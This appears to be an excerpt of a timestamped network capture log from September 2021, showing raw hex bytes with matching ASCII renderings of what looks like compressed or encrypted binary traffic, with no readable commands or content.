                                              2021-09-28 11:02:14 UTC172INData Raw: a7 f2 96 c2 6b 73 91 f6 f4 b8 d4 51 af 77 f4 f4 3b ba 9b b4 01 d8 4e 9c 42 c1 c0 80 b7 0c 61 c8 ff 66 bf ba a9 f4 98 e0 94 97 20 46 78 3b 98 56 de 17 2e d4 f2 bd d4 d4 ac 9d f0 5b e3 52 8f e8 09 cb f2 8e 8c e4 ab 2a 97 24 4e 4f 4a ed ae db 49 e1 4e 49 2f ee c5 d7 57 88 74 14 7a 50 76 52 6d 1d 82 71 dd 07 bb 10 9f 6b 2d 49 05 79 bd 83 4d 7e 39 dd a3 25 37 96 b4 fc 7c 56 75 c8 03 5c 8b 59 3e 1b 46 87 af 6c 2b 67 41 a5 20 be 4e 9a 9b 3b d2 e7 a1 9f 6c 97 69 85 95 47 c9 f1 4e 95 12 8f 88 35 dc 7e 0e 31 be 1f f5 38 8c 76 d3 05 a3 64 2f 8e e6 94 e5 19 4d b6 76 2c 65 c0 32 6c 9b 95 d1 8e 7f a9 56 d2 26 af 3b 10 ed 45 7d 8a 35 05 8a 8b 23 88 3e b6 e8 0e 16 73 ee c1 f2 db 1a 33 d5 d3 84 1b 6c 9c 11 e6 d1 b7 b0 bc f8 ff 52 3e 9f 9b 41 c0 94 8a a2 3c 74 c0 8e 91 10
                                              Data Ascii: ksQw;NBaf Fx;V.[R*$NOJINI/WtzPvRmqk-IyM~9%7|Vu\Y>Fl+gA N;liGN5~18vd/Mv,e2lV&;E}5#>s3lR>A<t
                                              2021-09-28 11:02:14 UTC173INData Raw: 38 f3 fe e5 75 7c a7 56 17 4d b5 14 01 a2 04 0f 06 63 a1 e2 f1 6f 83 ab 58 71 3c 4f c6 31 a0 55 48 5b 43 91 bf 43 0f 8b 29 0e 7f 9a ca db 23 5f 30 d2 74 f7 93 eb 52 82 c6 ae b6 43 66 68 3b 8e c6 af a6 79 de 38 19 a5 31 91 24 8d 34 ea 1f 30 f0 e8 ba 8f b0 e0 0c b7 72 ae aa b0 3c 29 76 d0 d1 ef 18 77 00 e6 62 15 9a a2 ef c8 10 a3 f6 96 1c 0f 69 2b d8 5b 43 e6 21 b7 64 c0 6d f5 3c 21 04 44 b3 2b f9 5d f4 58 67 97 cb 81 0f d1 1d df 55 bb 47 92 e1 78 22 37 5c 22 f1 89 ec 1e a8 e8 64 29 91 a5 e0 79 8b aa 5d 6a 67 d0 d8 70 f8 86 a7 d3 b3 a0 2b 08 92 36 4e ca e8 41 d4 88 a5 6a 24 d8 55 de d7 ae fa 91 a7 4b 67 b1 8b a2 fb c9 a5 7a 8b 27 24 ed 8a 43 27 14 76 c9 de 2d 21 cb 8f 97 35 fe 5f 1f 68 9f 8a 8f 28 a1 45 a8 5a 56 63 d7 e6 66 26 9b 6b aa 48 49 2e b2 ff bd 90
                                              Data Ascii: 8u|VMcoXq<O1UH[CC)#_0tRCfh;y81$40r<)vwbi+[C!dm<!D+]XgUGx"7\"d)y]jgp+6NAj$UKgz'$C'v-!5_h(EZVcf&kHI.
                                              2021-09-28 11:02:14 UTC175INData Raw: 4a 8b ae 2b 11 fd fb 20 e2 8b 66 c5 e9 21 b8 56 a4 af 18 66 9b 17 33 cc 96 b5 c9 94 41 d1 cf 78 c4 a9 f3 3e 8b 73 7f ee 7c bf 79 f6 40 8d 65 44 79 3f 8f 81 8f ca da e4 1f 55 88 42 ec f2 bc f6 c6 ee 95 65 ac 7f af 4e ec 05 a4 05 48 fe 51 d0 8b 59 4b 8b 88 2b c3 22 ff 7e 72 c5 25 43 c0 0a 95 1b 30 dd 8b 9a db fb e0 fb b0 7c b6 bc ee f9 fc 5a 94 90 ca 7e 98 88 1d 0f 3d 38 92 8f 92 18 c2 2b 58 51 d6 9f 08 3c 1a 08 58 91 4a 61 74 7a 47 dc 5e 91 b6 62 72 ae 04 c4 26 1c ba c7 88 4f 03 26 50 c6 bd 58 0c 6b 8c 2d 64 ed 94 38 ae 9b 61 27 e5 6c e1 59 a6 73 45 0a 28 6e 31 34 fe 49 0c 1a cd 14 53 4d f7 c5 ef 31 55 e7 2a c7 f5 b0 62 65 44 2c 40 f6 bf 43 c3 fc c1 87 64 71 77 a6 91 95 f5 81 79 2e fc 60 38 cc 8e c2 0c 35 c6 ea 3f a6 cc 88 68 90 fb 0f c9 08 ef 95 e0 7a 19
                                              Data Ascii: J+ f!Vf3Ax>s|y@eDy?UBeNHQYK+"~r%C0|Z~=8+XQ<XJatzG^br&O&PXk-d8a'lYsE(n14ISM1U*beD,@Cdqwy.`85?hz
                                              2021-09-28 11:02:14 UTC176INData Raw: 27 06 a2 75 57 f3 32 89 5a 9b 01 ca 17 0f 57 01 39 c0 c7 6d d1 9c 7a ca a0 5d b4 f1 b9 ee f8 3d 94 56 8d ec a7 c0 e1 8a 3c 5d 2f 7d 36 2d 0b ca 3e da d1 a7 39 2a 9e 92 52 4c 2c 7d 3d be 14 d8 68 44 41 54 48 d7 bd cc 77 32 37 fe 41 f5 a0 67 53 a4 ec 8b a9 21 0b 1f 3f 95 c1 08 cb ae b6 20 5d 8f a7 15 18 ca 63 ba b1 f5 8d d4 3c 44 3e 5a ee 66 31 13 1d f4 98 14 a8 88 e8 2f 24 ff de b0 04 ee c2 eb 11 fa fc eb 4a af e7 bb 7c 7b 88 ee b1 0d b5 e6 04 5e 5f 00 b9 7b 41 71 c3 0e 3d e7 53 f7 7e 2e 80 23 11 58 71 ef c1 92 62 c5 e3 01 f4 e8 cb 6f 0c 78 70 05 0e c2 9d 31 74 28 b4 1b 13 4c d2 35 e7 fa 38 e6 81 0f c1 ed 5b ab bf 9f bd df a6 a3 33 ed 88 64 de f6 96 5e cb 7b bf a6 95 93 24 6f 06 3b fd 6a b9 87 51 3f a4 f5 1a 0b 5c 9f c1 bb e6 f9 9a 16 c1 04 53 b6 93 64 2e
                                              Data Ascii: 'uW2ZW9mz]=V<]/}6->9*RL,}=hDATHw27AgS!? ]c<D>Zf1/$J|{^_{Aq=S~.#Xqboxp1t(L58[3d^{$o;jQ?\Sd.
                                              2021-09-28 11:02:14 UTC177INData Raw: f6 77 5f 98 1e a4 9d 9c c6 1b 9e 58 9c 4a 8f ca 04 0e ad 2c 93 7e 98 73 38 04 c8 33 f2 7c b9 48 de 71 24 84 3c bc ce 0c 2a 8c c3 df b3 dd 8b dc 99 69 dc e4 fa e1 56 b2 9d 82 54 e8 ba 43 36 ef b2 0d 8c cd 7f 56 b3 cb 9d 97 c3 27 e5 1a 3c f4 26 62 29 45 ca d5 8a c8 78 ae fe 29 7c 65 e7 77 33 03 73 f4 fc fd 3b 91 62 7b 30 8f 54 0c 43 47 0c aa da 2a d0 05 92 a3 f3 c8 9e ef 4a 75 9c ec c2 95 fc d8 2a 72 3c c7 d0 8c 6f 71 a0 f1 93 c7 13 96 87 ab 94 a7 2c 40 5a f0 40 91 eb 35 b2 e2 d9 38 8b 9f 08 da d3 67 14 bf cf 55 04 9d 98 90 2f 08 e3 8d 75 12 86 56 fa fc 72 ae 2b c8 9d a0 24 2f 3b 57 c6 cd a8 3e 9c cb b4 76 78 a2 13 02 92 55 a0 9d 3b 8c a2 d0 1a 5a 49 95 2d e2 e4 18 15 ea 98 e2 1e 87 70 66 4d 75 0c 00 33 00 e9 12 1e 36 67 a3 49 f1 ab 20 68 3d 7c e7 d7 b4 28
                                              Data Ascii: w_XJ,~s83|Hq$<*iVTC6V'<&b)Ex)|ew3s;b{0TCG*Ju*r<oq,@Z@58gU/uVr+$/;W>vxU;ZI-pfMu36gI h=|(
                                              2021-09-28 11:02:14 UTC178INData Raw: ec e2 92 a4 e9 50 ff fe 7d 4a bb 76 5d 9c 02 6e 73 d7 0f e9 e3 06 c8 5f e6 2e 9d 8e 2d 25 cd 5b e5 2b f2 7c b8 80 69 80 be 60 97 27 73 04 c7 77 04 f6 7e cb 37 98 9e df 5d e8 c4 fc 33 c4 2d b6 8d 13 40 4c d3 d8 82 de c2 e0 0d 0d e8 59 3d bf 10 29 39 b2 f2 d5 a7 e9 66 36 f3 94 c8 cb 3f 23 40 f0 eb c2 07 67 39 f9 6c bb 11 51 83 30 13 f6 46 ba 16 a0 b9 f9 ff 98 80 c1 85 d1 50 0e 1c c8 54 72 78 9b 15 f0 5a e0 a2 d0 c7 44 05 3b 50 42 f7 0b 67 d5 31 bd 7b 86 4b 9f 8d 5b 15 46 ba f4 c9 cb 31 8e 8c a1 4c 28 ea 24 5a 5a 29 e3 86 c5 89 e1 18 19 c8 ec b8 d7 65 9d 04 1a 54 4e b6 52 79 58 65 73 a0 07 fc 15 d9 4e ab 49 c4 79 1b b6 ab 7c 44 dd dd 20 0b b3 a7 fc bd 56 83 81 e4 5e f6 59 b7 06 d3 86 20 72 ea 67 8a fe c7 bc 33 9a 31 26 47 e6 17 9b ad 97 2d ca 72 45 b4 f1 80
                                              Data Ascii: P}Jv]ns_.-%[+|i`'sw~7]3-@LY=)9f6?#@g9lQ0FPTrxZD;PBg1{K[F1L($ZZ)eTNRyXesNIy|D V^Y rg31&G-rE
                                              2021-09-28 11:02:14 UTC180INData Raw: 2e 98 97 87 c8 28 e4 3c 7d 43 6a d0 14 46 11 c9 c5 8f 86 85 3d 94 94 8b a6 51 89 a6 97 be 37 0c f2 db ae 8b 6a 9b 3c 58 00 f2 9b 9a 57 db 8d 9a 06 2f 91 44 6b 44 6b 60 13 af fe 72 bf 29 5e 9d bf b4 c9 71 31 20 a7 fd 3c bd da b6 e0 78 ed b7 e4 f7 2c 46 16 6e 8e e0 c1 18 cc 49 dc bd 04 f0 45 f3 42 cd e0 7d 96 72 f0 4d 9e ae e6 a0 79 0f db 4b 34 e3 b2 4b 67 ab 44 ff db 4d bb 31 5a 7d dd 5a 1d b5 5d 43 84 1d ce 0c 02 9a d2 f2 b6 5e 41 f6 96 f7 a4 7a b5 80 bb ae 80 6a f3 69 bc aa 25 af 75 ee 39 3a 64 a5 65 b8 b1 8c ae ce ff 30 19 78 5d 8d cd e0 79 9e 87 a8 30 94 dd 29 ef 46 36 ed 65 77 90 cf 97 13 5d 86 01 c8 f7 33 11 94 61 0f d7 02 2d 5d 50 e6 ce b7 9c 5c 8a f7 41 21 d8 6d 75 2a f3 78 1b 58 09 03 2c 83 72 d1 e7 f6 c0 ba 6d b7 0e 78 2f aa bb 20 8c 89 f7 34 3d
                                              Data Ascii: .(<}CjF=Q7j<XW/DkDk`r)^q1 <x,FnIEB}rMyK4KgDM1Z}Z]C^Azji%u9:de0x]y0)F6ew]3a-]P\A!mu*xX,rmx/ 4=
                                              2021-09-28 11:02:14 UTC181INData Raw: ca f9 6e 7a 0d 15 a7 ed 06 46 af 21 54 4c 39 9e 5e f5 9d 67 03 a3 5b d2 ef ad ae c4 59 e5 5a b8 62 c9 4a 86 68 9e df aa 7f a3 26 48 47 2b 75 86 c2 1a 07 08 72 2e 99 f1 d5 51 80 06 8c 54 ef 05 b4 3f 26 83 e9 e9 05 aa 08 db d8 ab 78 57 9f 0b dc 4d c4 0d df a5 3d 09 25 a7 20 00 b0 ef ff 02 87 bf 5b 2d 1b d1 10 20 29 79 81 c7 94 21 42 7a 98 8a 3b 45 70 17 79 0b 71 b7 b4 94 59 fc f3 5d 95 85 18 3e ae 8e 98 ec 01 bf 5f c0 3a 9d 76 44 92 3f 6c 49 68 c8 a7 e4 78 78 b4 67 2c f2 57 f6 cf c9 73 67 d1 7f 2b 63 d0 20 b7 05 a3 fe 73 1b 6c 5b 36 8b 28 16 8a 2f b6 7f 99 c5 95 bc 27 08 e8 1b f7 e0 d1 97 1b fb 0b fb ee b4 51 be 93 f9 1a 67 3c 99 83 7f 73 88 b7 f3 da 3a ef 8f 97 26 77 22 98 51 3d 9f ce f4 fd 0a 25 91 61 5f ca 79 0e dd b5 91 32 9e 95 ac 79 c4 6c 22 7c c4 48
                                              Data Ascii: nzF!TL9^g[YZbJh&HG+ur.QT?&xWM=% [- )y!Bz;EpyqY]>_:vD?lIhxxg,Wsg+c sl[6(/'Qg<s:&w"Q=%a_y2yl"|H
                                              2021-09-28 11:02:14 UTC182INData Raw: 55 df cc 1d 06 c8 a5 25 66 28 4e 3f 98 dc db b4 c8 41 1c 17 11 11 06 53 e0 86 ac b0 43 f1 ff bc 57 b0 49 60 94 df bb 59 a7 37 91 b3 1a ae 25 70 d6 f2 04 bb 2a f0 e2 0d b7 85 3e 30 b3 4f cf a0 3c d0 28 58 75 06 e6 95 85 5d a0 8c 2e ae 4c f7 7e 5c 0d 6f 2b 2f cb 50 b7 5c 51 8e 29 6c fc 7d 23 02 44 77 bc f3 81 92 be 99 7c ca aa 4e d3 1b df c2 2c 6d 32 9c 9e c8 dd 5d 6e b0 8b ea 1e 3f 7f 56 2f c9 43 c2 9c 8a c7 1c 68 66 d0 2f e0 ca 0c da 35 a5 44 2a 87 d3 34 48 ca 7f d6 be f7 fd 8c 46 3c 54 6f 96 ac ec 91 30 dc fe 4d f5 44 65 2e a4 a9 ca 25 25 ed 1d d4 95 b5 2d 2f ac cb 20 3e ce 95 34 fe c8 88 ba b0 f5 69 d6 41 44 be 18 54 62 d7 11 f6 f4 1a 34 4c 8a 95 2f 8a bd bf 91 e2 ec 29 eb 64 fa 18 e9 37 af 2b f9 9c 7f 6e ec 5a 0d 36 c8 e0 5c 22 00 53 39 8e 50 25 0c d6
                                              Data Ascii: U%f(N?ASCWI`Y7%p*>0O<(Xu].L~\o+/P\Q)l}#Dw|N,m2]n?V/Chf/5D*4HF<To0MDe.%%-/ >4iADTb4L/)d7+nZ6\"S9P%
                                              2021-09-28 11:02:14 UTC183INData Raw: cb 95 d2 9a d8 29 f6 7e 94 30 bd 1f f5 38 0b 76 9e 06 d9 62 05 8e 51 96 e6 19 4d b6 f1 2c 6d d5 10 70 b1 95 d9 e0 7d a9 56 d2 b6 b7 01 36 18 47 57 8a 87 07 89 8b 23 88 b9 b6 7c 19 23 6f c4 c1 0a d8 19 33 d5 d3 01 1b d5 9e 1d e6 fb b7 9e a3 fb ff 52 3e 0f 83 79 f2 6e 97 88 3c 7c df 8d 91 10 75 b4 98 33 a8 79 9e bb 1b 6e 15 93 49 69 c8 ef 0e 9e 34 77 7c e5 73 26 49 c6 25 14 7e 52 48 c3 7d c0 86 41 bc f2 41 69 8f 25 dd 58 dd 54 c4 7d 6b a1 e4 a0 ac 5b a5 7b 80 bf e8 d8 4f d2 ed cf 0d f7 80 16 55 55 c9 76 97 db 3f 01 18 41 f4 be 2c 67 52 2c d7 61 c8 6f ba 1a 2b 01 65 5e 39 a4 00 95 f6 17 fd ec 98 86 79 4d 8f 93 42 37 50 ea a8 31 2a a0 11 76 a1 8e c8 7a a1 97 76 7a ee 29 95 ae d3 ce 70 41 c7 d5 c2 d0 69 46 f3 78 c7 db 82 63 a9 e9 a7 0f 0e 51 f4 a6 93 00 35 f0
                                              Data Ascii: )~08vbQM,mp}V6GW#|#o3R>yn<|u3ynIi4w|s&I%~RH}AAi%XT}k[{OUUv?A,gR,ao+e^9yMB7P1*vzvz)pAiFxcQ5
                                              2021-09-28 11:02:14 UTC185INData Raw: 67 e8 b0 0e 95 a5 64 b9 88 aa 5d 6a f0 d0 b8 70 2c a1 a3 d3 61 61 28 08 92 36 de ca d4 41 58 af a1 6a ac 19 56 de d7 ae 7a 91 3b 4d 18 96 8c a2 6d 0a a6 7a 8b 27 b3 ed c0 43 73 33 71 c9 82 ef 22 cb 8f 97 a2 fe 89 19 5c b8 8d 8f 9a 65 46 a8 5a 56 f4 d7 1b 62 12 bc 6c aa f8 b1 2d b2 ff bd 07 e2 2e b8 0d 52 82 fe 79 13 ad 71 bb 9e e9 6e 6a ce eb eb 9e 06 ea 06 02 2f 7b 8c c6 25 1b 4a 01 29 8f 7c f8 d9 21 87 58 62 7c 27 23 1d 23 75 79 f6 1f 92 6d 9a 78 dd b6 e8 9a f4 d7 c6 50 b6 03 49 4e 44 35 da 69 de 39 fe e9 0f 95 59 91 e5 9d 2b df b0 19 d5 4d e1 82 34 8e 94 05 91 79 29 a6 f2 00 c2 6a 78 dd fb 11 bb fa 0b 3d 32 f5 f4 ad ba 9b aa 5d fb 82 98 89 9b 06 c5 b6 0c f7 c8 c8 6d 9c 99 68 f0 0d ba 46 d2 21 46 ee 3b 97 49 13 09 1a d5 45 e7 d2 92 ad 9d 66 5b 80 59 5e
                                              Data Ascii: gd]jp,aa(6AXjVz;Mmz'Cs3q"\eFZVbl-.Ryqnj/{%J)|!Xb|'##uymxPIND5i9Y+M4y)jx=2]mhF!F;IEf[Y^
                                              2021-09-28 11:02:14 UTC186INData Raw: 48 4f 7f 26 06 2f bc 58 0d 6b 0d 36 dd ce dc 39 51 88 69 dc e5 6c 63 4a a5 7b 81 29 6a 7d 4c 34 ee b2 8f 09 cd 14 54 55 4b f3 97 36 29 e7 98 2f f4 b0 63 65 d0 3f d7 f7 c9 6f 3c ef 29 7c 64 71 f5 b5 00 95 f7 81 7f 11 80 60 7a 30 8f c2 0d 35 52 ea a8 a7 2b 8a 11 90 a3 f3 ca 08 ea 95 76 7a ef bf 94 87 c8 28 73 3c c5 46 8c d2 6b 46 f7 ee c7 8f 84 85 ae 94 a7 ba 43 53 f2 a6 93 96 37 0c f1 db 38 8b 9f 9e db 5a c7 d9 bd b2 54 db 0f 89 90 2f 09 75 1e 5a 16 60 55 87 02 5d af 39 cb 9d a0 b2 3f 63 49 20 cf d5 2e ad d8 b6 76 78 a0 85 00 f5 51 46 9d 46 8f e0 c1 18 58 49 91 bb e2 f2 3a f3 ed e5 e2 7d 94 72 60 4d 75 9a 02 a2 03 0f 10 63 34 e3 b0 4b f1 ab 22 fe 3e 4f c6 31 a6 45 dc 5a 1d b5 db 53 25 1b 28 0e 6f 8a de db b4 5e 51 e6 03 f7 13 7b 43 92 c5 ae b0 43 e1 79 b8
                                              Data Ascii: HO&/Xk69QilcJ{)j}L4TUK6)/ce?o<)|dq`z05R+vz(s<FkFCS78ZT/uZ`U]9?cI .vxQFFXI:}r`Muc4K">O1EZS%(o^Q{CCy
                                              2021-09-28 11:02:14 UTC187INData Raw: 89 f2 29 f4 7d 2d 33 35 f4 5d 63 e9 6c 8a bc c6 66 07 a4 f1 cc 69 8b 7b f0 12 f1 c6 49 30 1a 3d 56 18 ba 4d 3c 25 c9 ff cf e7 d5 22 5b ee 48 aa 86 b3 ee da a1 8e 42 c3 30 61 72 f3 75 70 e5 7a 65 a6 60 8c ad 6b 37 3b 62 76 ce 81 30 3e c3 d6 88 3d ab 9c 6d 98 7a f9 b1 15 ff 21 d6 b6 1d 60 8b d5 ab 7f 8a 14 2b e0 25 41 c3 20 3e 52 b1 98 4f f4 da 4b ca a6 dc d1 bd b6 0c f6 62 e6 64 9d e7 c9 9f a7 b0 b9 b1 aa d3 97 50 5e 14 2c bf 86 fb 3a f2 0a 6b 2e d0 e0 c4 51 b1 07 ff 5a ae 22 3e 3d 65 a6 09 da 63 aa 07 d3 cc ac 10 51 5f 2c 32 4a 3f 3a 65 8b a4 0e df a7 6b 2a cb ea ee 02 cb 8a f8 2a 77 d1 11 21 92 7d 33 c5 a2 2a 1b 49 db 89 74 75 c3 13 f2 38 06 aa 12 96 ee c9 7d 4b bb 84 ef 3f 9c 80 14 ed d5 bf ed ee 81 9a 2a 44 0b 37 e2 7f b7 c9 1e ea d9 4a e2 67 cd dc ef
                                              Data Ascii: )}-35]clfi{I0=VM<%"[HB0arupze`k7;bv0>=mz!`+%A >ROKbdP^,:k.QZ">=ecQ_,2J?:ek**w!}3*Itu8}K?*D7Jg
                                              2021-09-28 11:02:14 UTC189INData Raw: ea f0 57 38 4a b4 99 ca c6 7d d4 98 a9 45 7f 8d 22 be bf 08 d1 8d 09 26 45 50 b6 fd 91 b2 f2 ca b4 a1 15 1c 9b 4f 41 cd eb 1b 7d da d7 74 8e 84 f2 12 84 54 60 ba d5 8b 89 c4 df 73 37 85 c2 e7 60 22 77 f8 6c e7 47 85 3b 67 54 74 64 26 29 14 16 11 cd 18 ec b1 6a f0 b7 2d b7 3c 26 c5 73 84 9a cf 7b 1c 16 e5 99 37 b2 28 67 4b 90 df ba b6 60 64 f8 11 76 16 ee 79 a7 c2 07 b5 57 dc 7f ad 53 b3 58 79 84 cd f9 1c a0 2b e2 a1 9d af 82 71 b3 f6 d5 bb b1 95 f3 0d e6 87 96 15 54 4b 85 a2 4e d8 2f 13 96 05 34 95 d7 5e 2a 97 cd 9f 08 fd 3a 1c 9d 75 14 25 4c 51 69 40 34 8a b5 6f 1b 2f ad 07 a5 74 14 d6 0b 88 b9 98 3f ef 19 0c b8 1b fd cb 39 7f 0e 9d 27 d9 2a 4f f3 f4 b7 cf 0d 3f 38 54 fe e8 3a d2 00 8f 94 78 ce 74 01 2d 57 dd 0a cc 02 a5 4a 0f c2 9c e7 4a e0 6c ee ac 7c
                                              Data Ascii: W8J}E"&EPOA}tT`s7`"wlG;gTtd&)j-<&s{7(gK`dvyWSXy+qTKN/4^*:u%LQi@4o/t?9'*O?8T:xt-WJJl|
                                              2021-09-28 11:02:14 UTC190INData Raw: 69 f6 cd d3 a9 af 4d a0 5d 3d 0a 2d 09 40 15 c6 95 c5 a6 e2 61 27 86 cf 7c d4 2a a8 97 19 ed 4d ee 66 88 7a 3a 72 4b 0f 14 29 62 4a 35 7a a2 58 40 a6 73 5b cc fc 64 3e 40 ba 5a dd ea 55 22 ac 06 7e c2 5e 61 34 ff 87 c1 70 42 42 05 e9 e0 bd c5 81 12 38 04 e3 29 be ca 95 74 ca 84 68 c3 d3 9c 96 83 a1 1d 09 4a 7d 18 50 4a 3e 34 3b a0 7f 03 26 96 60 80 94 83 db 4d 19 f1 9e 19 0e cb c2 b4 7b 0c 92 5c af 3d a0 d0 f0 89 b7 6a 21 51 5d d3 8b d9 5b 06 a9 e2 8b a2 a5 c5 2d 84 6f af f3 cf b7 da 30 eb f6 93 38 32 99 c5 c1 95 b7 75 ea 00 dd b2 3d b5 82 41 c0 79 97 3c 38 e9 9a cb b2 d1 76 b5 9f 39 88 56 98 b3 13 26 59 50 4a e4 cf 11 2d 14 27 fe 65 01 74 d7 03 fa 00 e5 7c 7d 48 71 5b a9 a7 85 bc 66 23 78 8f a4 da 5a fa 89 f0 af 68 e2 c1 7f e1 d0 a2 4b 94 8a ed 87 4e cd
                                              Data Ascii: iM]=-@a'|*Mfz:rK)bJ5zX@s[d>@ZU"~^a4pBB8)thJ}PJ>4;&`M{\=j!Q][-o082u=Ay<8v9V&YPJ-'et|}Hq[f#xZhKN
                                              2021-09-28 11:02:14 UTC191INData Raw: e4 a8 4c a6 6a e9 83 3a e2 af 3f 91 d3 8e e8 cc 61 30 98 7b 44 86 b8 e0 61 b5 c3 aa 38 94 3b 2b e3 43 d8 ef 6c 75 a2 e9 9d 13 25 84 c5 d6 a4 31 8b 94 4b 11 67 2b af 5f 0c f8 50 b7 08 56 0d eb 34 21 8e 46 4b 28 fb 78 1d 5a de 01 c2 81 9b d3 e4 d6 ca ba d5 b5 dd 78 c2 a0 e1 20 0e 80 e2 1e ff eb ad 06 e0 a5 04 e3 b0 b5 55 6a ae d2 10 69 c2 a3 12 d1 e3 26 22 08 42 34 01 d5 77 40 66 af 99 6a 4c 41 88 dc 48 a1 e4 91 d0 48 01 9d f9 a2 83 51 00 75 83 27 cd ef 5b 40 9d 31 e0 cb fd a9 28 cb 7f 95 75 fc c0 1e 4e b8 59 80 dc 3c bc aa 71 59 6a d7 ed 62 ac a1 19 aa 88 eb 72 ad f7 bd 95 e1 8e a0 e3 50 f7 fd 8c 55 a7 71 b7 9d 13 71 e4 cc 1d ea 92 19 56 5f 14 2c 0d 93 58 25 b0 43 a2 2b fa 7c ee 83 d8 8d 50 62 2e 24 d6 1d cd 77 c8 f5 d4 c9 67 9a a8 de 65 e8 c8 e0 e5 c7 d2
                                              Data Ascii: Lj:?a0{Da8;+Clu%1Kg+_PV4!FK(xZx Uji&"B4w@fjLAHHQu'[@1(uNY<qYjbrPUqqV_,X%C+|Pb.$wge
                                              2021-09-28 11:02:14 UTC192INData Raw: 5e ec ba d6 47 7f ae 64 ba 4d f7 3b 31 1e 90 e5 fb 31 69 42 56 97 be 3f e9 33 c0 63 ae d9 a1 a5 1f 16 b4 06 74 c8 bf 8a 9c e6 01 e6 4e 9b 5f a1 f5 e7 de 4c 55 87 18 61 47 96 2b eb f7 26 4f 91 87 0f 59 3d 15 4e 32 80 2e d9 db 17 79 b1 06 49 ac 59 7c fd 5e b1 f9 b8 84 8e 23 e5 1d 35 2e e5 2a 6e df 07 2a 1d 79 79 d5 4a 92 07 f1 ec 8d 1b 7b b9 94 fe be 4f 8e 7a db 58 20 0a f8 4a 52 10 d6 96 43 3e a5 30 2b 71 5a c4 3c 12 9c c3 cb 18 2e 94 77 40 6e 09 b5 d2 bc 4a 17 d9 9e 59 bc 54 9e 83 f3 b0 fd a7 d1 24 dc 46 01 16 06 e4 53 12 3d cd de 80 aa ad 81 b7 61 d4 3a 2f fd bd 53 52 da 97 c3 af 4d 00 8f 14 87 6f d8 fb 1e 6f 25 c7 c3 a5 a0 af e9 be f3 90 2a 79 82 8c ec bc bd 26 63 f1 80 a1 45 b4 e7 71 f1 d9 7b 99 b4 f0 77 b1 d2 03 53 59 e2 6a 9d 4c 50 87 fd 72 b9 29 cd
                                              Data Ascii: ^GdM;11iBV?3ctN_LUaG+&OY=N2.yIY|^#5.*n*yyJ{OzX JRC>0+qZ<.w@nJYT$FS=a:/SRMoo%*y&cEq{wSYjLPr)
                                              2021-09-28 11:02:14 UTC194INData Raw: c2 dc 68 44 b0 55 af d7 af ec 63 31 3b fe 96 f1 5a 66 20 a4 7b 8b de 24 9e 1d 40 95 cb 0d bc ae b7 20 30 8e e2 34 fc c8 e2 bb cd f0 8e d4 c1 45 df 5a 54 62 29 10 19 f4 bf 11 55 89 91 2f b0 ff 9e 93 99 ec be eb 74 fd 85 eb 48 af 54 b9 e3 7f 6f ec ea 0f 94 e3 04 5e 78 02 50 7b 8d 50 0d 0e 3f e7 29 f2 55 2c 01 23 86 58 48 e8 a6 90 05 c5 2f 06 bd ec d0 6f 14 7a 96 24 d9 c0 de 32 71 29 87 1b 53 4f f3 31 eb ff 9c e7 45 0b 3c e8 1d a8 04 9b 1f df c4 8c e9 ec cc 64 4e f0 3b 5e 86 7b 69 a2 5d 96 9b 6d 1d 22
                                              Data Ascii: hDUc1;Zf {$@ 04EZTb)U/tHTo^xP{P?)U,#XH/oz$2q)SO1E<dN;^{i]m"
                                              2021-09-28 11:02:14 UTC194INData Raw: 8b 6c 29 9e d9 26 43 ec 8a 22 ea 9d e7 a2 93 ff e9 16 b9 04 ba b6 52 60 27 f8 98 7b c4 13 97 ca aa 43 88 26 27 7f 54 99 ee f2 da 60 ff af 8c da d7 a6 8e e0 7c f5 23 aa ba da 55 b3 26 88 14 be ee 83 f6 5c 9b 3f 11 92 cd 0a 8e 11 72 35 62 db cb 71 bb 26 5a 74 75 03 55 19 cb a6 db f5 b6 82 dd f3 55 82 e2 7b 49 22 c2 61 7e 38 f8 a5 e4 29 b1 a7 bc 2a 71 ed 9f 1e 59 8b 1d 2c 7c d1 c0 2c 73 7c 24 c4 82 21 d9 4f 9b 8a 78 44 8b 17 78 3e 96 b5 c9 95 3e c9 ae 6c 97 85 8e 3f 50 8b df de 7e bf 59 f4 45 9d b3 52 06 3f 60 79 f1 ca 70 f4 1b 4d b6 66 ad f2 12 c4 70 cc 95 64 2f 7f e9 71 d5 20 b7 04 b0 fe ed 1b 8d 59 08 8a 0c 23 44 28 b4 7f 4c c4 e4 b9 ce 3a 96 1b 70 d4 58 97 87 ca 9e fb e4 87 04 bc 34 f3 f7 52 7d 98 36 7f 66 89 94 f5 3c 39 53 8f 9a 3e 73 22 98 50 68 9f 67
                                              Data Ascii: l)&C"R`'{C&'T`|#U&\?r5bq&ZtuUU{I"a~8)*qY,|,s|$!OxDx>>l?P~YER?`ypMfpd/q Y#D(L:pX4R}6f<9S>s"Phg
                                              2021-09-28 11:02:14 UTC195INData Raw: 26 09 04 1b ee 31 94 04 47 5d 22 75 b0 fa 0a c3 9e 16 fe 78 7a f2 74 82 17 9b 69 30 f4 8d 76 10 36 1c 3d 3e ab f1 9a 85 18 76 db 30 b6 2a 4b 64 b4 82 ef 86 07 c6 5f bc cd d6 db 3d bc 8b 7e 21 a5 0b dc dc e8 db a2 0c 0e f0 3b fa 8f f3 a1 0d f3 c4 a8 75 d5 4b 6f e3 41 97 ae 18 3f 47 e6 f4 52 5d e4 d6 c8 cf 70 f7 f2 5d 0f 28 4e 5b 10 3f 82 2d db e9 12 05 99 59 6f 63 29 12 6b f3 1e cc 58 fc 40 ca e9 4e d1 5c ba b6 ec 02 db ed 15 af e9 33 44 9e fb 87 7f 4b 80 39 62 a9 a5 82 a3 8a e9 1f 6a 22 92 2f 33 88 a3 98 91 a7 7e 68 08 da 74 48 ab 3d 40 dc ef dc 09 06 41 30 9c d7 cb ae 91 56 08 fe f3 b3 a2 0f 11 a4 32 c6 66 66 ed 5f 01 95 72 4f c9 ea f5 20 8e cc 97 72 bd c8 59 f9 ba b8 cc d4 5d 07 a8 38 15 62 b4 52 60 90 fd 11 cf cb e8 49 f1 ff da d2 e2 84 fc eb 12 bb fe
                                              Data Ascii: &1G]"uxzti0v6=>v0*Kd_=~!;uKoA?GR]p](N[?-Yoc)kX@N\3DK9bj"/3~htH=@A0V2ff_rO rY]8bR`I
